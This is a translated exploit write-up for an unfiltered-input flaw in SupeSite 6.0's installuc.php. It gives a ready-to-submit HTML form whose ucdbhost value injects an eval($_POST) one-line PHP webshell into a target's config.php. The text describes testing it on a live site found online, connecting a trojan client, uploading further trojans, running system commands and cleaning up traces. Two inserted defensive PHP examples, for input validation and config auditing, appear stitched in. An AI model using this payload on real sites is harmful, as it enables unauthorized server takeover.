For me, the vulnerability is located in a configuration file. If the target website has already configured this file, the vulnerability cannot be exploited; only sites where the file has not yet been configured are exposed. Of course, some sites have not configured the file. Although the official SupeSite version has now reached 7.0, 6.0 is still deployed on many servers, so this is a threat to a small number of websites. Few people know about this vulnerability. It is found in the installuc.php file, which can be downloaded from the official website. The source code is Zend-encrypted; we can decrypt it at dezend.cc or with a tool. Because I am lazy, I simply looked for a test target on the internet and found one:
If this page is displayed, it means the site has not been configured, that is, it may be exploitable. The source code contains segments like the following.
elseif ($step == 1) {
    ......
} elseif ($step == 2) {
    ......
} elseif ($step == 3) {
    ......
}
These are the first, second, and third steps. The vulnerability is in step 3:
function insertconfig($s, $find, $replace) /* write function */
{
    ......
}
$ssconfig = S_ROOT."/config.php";
$ucdbhost = $_POST['ucdbhost']; /* the variable we want to use */
$ucdbuser = $_POST['ucdbuser'];
......
$s = file_get_contents($ssconfig);
$s = trim($s);
$s = substr($s, -2) == "?>" ? substr($s, 0, -2) : $s;
$s = insertconfig($s, "/define\('UC_CONNECT',\s*.*?\);/i", "define('UC_CONNECT', 'mysql');"); /* call the write function */
$s = insertconfig($s, "/define\('UC_DBHOST',\s*.*?\);/i", "define('UC_DBHOST', '{$ucdbhost}');");
$s = insertconfig($s, "/define\('UC_DBUSER',\s*.*?\);/i", "define('UC_DBUSER', '{$ucdbuser}');");
......
if (!($fp = @fopen($ssconfig, "w"))) {
    instmsg("Failed to write the configuration file. Please go back and check whether ./config.php has permission 0777");
}
@fwrite($fp, $s);
@fclose($fp);
if ($fp = @fopen($lockfile, "w")) {
    fwrite($fp, "");
    fclose($fp);
}
print '<table class="showtable"><tr><td><strong># Configuration completed</strong></td></tr><tr><td id="msg1"><br />You have completed the UCenter configuration. Log on via FTP to delete the installuc.php file.<br /><a href="javascript:;" onclick="javascript:backwindow(\'installuc\', \'\');">Click to return to the main interface for the next step</a></td></tr></table>';
There is a lot of code, and parts like this have been omitted. In the code above, we can see that the variables obtained from POST input are written directly into config.php without any filtering.
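As an added example (this is not SupeSite's code), here is how that installer step could have been written so that an untrusted POST value can never break out of the define() literal: the value is first checked against a narrow character set, and whatever survives is emitted with var_export(), which always produces a quoted, escaped PHP string. The function names validate_db_setting and safe_insertconfig and the sample config text are assumptions made for the example.

```php
<?php
// Added example, not SupeSite's code. Function names are hypothetical.

/**
 * Validate one installer value before it may be written into config.php.
 * Only characters needed for hostnames, host:port pairs, user names and
 * table prefixes are allowed; quotes, parentheses, semicolons and PHP
 * open/close tags are rejected outright.
 */
function validate_db_setting(string $name, string $value, int $maxlen = 64): string
{
    if (strlen($value) > $maxlen || !preg_match('/^[A-Za-z0-9_.:\-]*$/', $value)) {
        throw new InvalidArgumentException("invalid value for $name");
    }
    return $value;
}

/**
 * Replace (or append) define('NAME', ...) in $s. The value is rendered by
 * var_export(), so whatever the user typed becomes a quoted, escaped PHP
 * string literal; a stray quote or "?>" in the value stays inside the string.
 */
function safe_insertconfig(string $s, string $name, string $value): string
{
    if (!preg_match('/^[A-Z][A-Z0-9_]*$/', $name)) {
        throw new InvalidArgumentException('bad constant name');
    }
    $line = "define('" . $name . "', " . var_export($value, true) . ");";
    $pattern = '/^define\s*\(\s*[\'"]' . preg_quote($name, '/') . '[\'"]\s*,.*?\);.*$/im';
    if (preg_match($pattern, $s)) {
        // The callback returns $line verbatim, so a "$" or "\" in the escaped
        // value cannot be misread as a backreference by preg_replace().
        return preg_replace_callback($pattern, function () use ($line) { return $line; }, $s, 1);
    }
    return rtrim($s) . "\n" . $line . "\n";
}

// Constructed sample config.php contents (not a file from a real site).
$config = "<?php\ndefine('UC_DBHOST', 'localhost');\ndefine('UC_DBUSER', 'root');\n";

// A legitimate value passes validation and is written as a quoted literal.
$config = safe_insertconfig($config, 'UC_DBHOST', validate_db_setting('ucdbhost', 'db.internal:3306'));

// A value carrying a quote and a close tag is rejected before it reaches the file.
$hostile = "'); echo 'injected'; ?>";
try {
    validate_db_setting('ucdbhost', $hostile);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Second line of defence: even without validation, var_export() keeps the
// payload inside the string literal, so nothing runs when config.php is loaded.
echo safe_insertconfig($config, 'UC_DBUSER', $hostile);
```

The two layers are deliberate: the allow-list stops bad input at the boundary, and var_export() guarantees that even a value which slips past some other path is written as data rather than code. Together they remove the `"define('UC_DBHOST', '{$ucdbhost}');"` interpolation that makes the original step exploitable.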
Now I provide a simple piece of exploit code:
<body>
<div class="bodydiv">
<h1>Configuration form</h1>
<div style="width: 90%; margin: 0 auto;">
<br><form id="theform" method="post" action="http://www.xxx.com/installuc.php?step=3">
<table class="showtable">
<tr><td><strong># Fill in the relevant information. Don't share it! Thx</strong></td></tr>
<tr><td id="msg1">Set the UCenter information here</td></tr>
</table>
<br>
<table class="datatable">
<tr>
<td width="15%">$code:</td>
<td><input type="text" id="ucdbhost" name="ucdbhost" size="60" value="'); eval($_POST['sunwear']);?>"></td>
<td width="20%"></td>
</tr>
</table>
<input type="hidden" name="apptype" value="SUPESITE">
<p align="center">
<input type="submit" name="submit" value="Submit" style="height: 25">
</p>
</form></div>
<div id="footer">&copy; Comsenz Inc. 2001-2008 www.supesite.com</div>
</div>
<br>
</body>
</html>
Replace the address with the target address. The step parameter in my code is 3, so we can submit the variable content we want directly, without any additional settings. The trojan is a one-sentence PHP backdoor whose connection password is sunwear. I tested it against the test target I found. If the returned content is
# Configuration completed
You have completed the UCenter configuration. Log on via FTP to delete the installuc.php file.
Click to return to the main interface for the next step.
then the submission succeeded. If you then open the config.php page and see
); // UCenter database host
define(UC_DBUSER, ); // UCenter database username
define(UC_DBPW, ); // UCenter database password
define(UC_DBNAME, ); // UCenter database name
define(UC_DBCHARSET, ); // UCenter database character set
define(UC_DBTABLEPRE, ''.); // UCenter database table prefix
define(UC_DBCONNECT, 0); // UCenter database persistent connection, 0 = disabled, 1 = enabled
// communication related
define(UC_KEY, ); // the communication key with UCenter, which must be consistent with UCenter's
define(UC_API, ); // the URL address of UCenter, which the profile picture call depends on
define(UC_CHARSET, ); // UCenter character set
define(UC_IP, ); // UCenter IP address; when UC_CONNECT is not in mysql mode and the domain name is resolved by the current application server, set this value
define(UC_APPID, ); // the ID of the current application
// ==========================================================
define(UC_PPP, 20);
it indicates that the trojan has been written to config.php. The reason the rest of the file is displayed is that the written code ends with "?>": once the PHP trojan code has been parsed, everything after it is output as plain text. Now we use a PHP trojan client to connect to the target website, and then we can upload a trojan. phpinfo() shows that the operating system is Linux. This vulnerability is not affected by the gpc switch, and it also affects Windows; on some Windows systems where PHP runs with high privileges, system commands can be executed directly from the PHP webshell. One thing must not be forgotten after gaining access: if config.php is left like this, the homepage will also show an error, so the file needs to be restored to normal.
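The breakout described above leaves visible traces in config.php: an eval() call, a request variable, a "?>" close tag in the middle of the file, and PHP source that is now plain text. As an added example (not SupeSite's or the author's code), the following audit function uses PHP's own tokenizer to report anything in a UCenter-style config.php that is not a plain define() on literal values. The function name audit_config_source and both sample files are constructed for the example.

```php
<?php
// Added example, not SupeSite's code: audit a UCenter-style config.php with
// PHP's tokenizer and report anything other than plain define() calls on
// literal values. The function name is hypothetical.

function audit_config_source(string $src): array
{
    $findings = [];
    $opens = 0;
    foreach (token_get_all($src) as $tok) {
        if (!is_array($tok)) {
            continue; // single-character tokens such as ( ) , ; .
        }
        [$id, $text, $line] = $tok;
        switch ($id) {
            case T_OPEN_TAG:
                if (++$opens > 1) {
                    $findings[] = "line $line: second PHP open tag (code appended after a ?> breakout)";
                }
                break;
            case T_CLOSE_TAG:
                $findings[] = "line $line: close tag ?> inside the config (the rest of the file becomes plain output)";
                break;
            case T_EVAL:
                $findings[] = "line $line: eval() call";
                break;
            case T_VARIABLE:
                $findings[] = "line $line: variable $text (config should contain literals only)";
                break;
            case T_STRING:
                if (!in_array(strtolower($text), ['define', 'true', 'false', 'null'], true)) {
                    $findings[] = "line $line: unexpected identifier $text";
                }
                break;
            case T_INLINE_HTML:
                if (trim($text) !== '') {
                    $findings[] = "line $line: non-PHP text in the file: " . trim($text);
                }
                break;
        }
    }
    return $findings;
}

// Constructed samples (not files from a real site).
$clean = "<?php\ndefine('UC_DBHOST', 'localhost'); // UCenter database host\ndefine('UC_PPP', 20);\n";
$tampered = "<?php\ndefine('UC_DBHOST', ''); eval(\$_POST['k']); ?>');\ndefine('UC_DBUSER', 'root');\n";

foreach (['clean' => $clean, 'tampered' => $tampered] as $label => $src) {
    $findings = audit_config_source($src);
    echo $label, ': ', $findings ? "\n  " . implode("\n  ", $findings) : 'ok', "\n";
}
```

Run against the tampered sample it reports the eval() call, the $_POST variable, the close tag and the orphaned source text that follows it, while the clean sample reports nothing. The same check is cheap enough to run after every installer step or from a cron job, which catches exactly the state the installer leaves behind here.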
Change
define('UC_DBHOST', '\'); eval($_POST['shArpWinner']);?>');
to
define('UC_DBHOST', '');
and that is enough.
The above is a successful example. On some websites, after submitting and being told that the configuration is complete, accessing config.php returns a blank page, which means the configuration failed.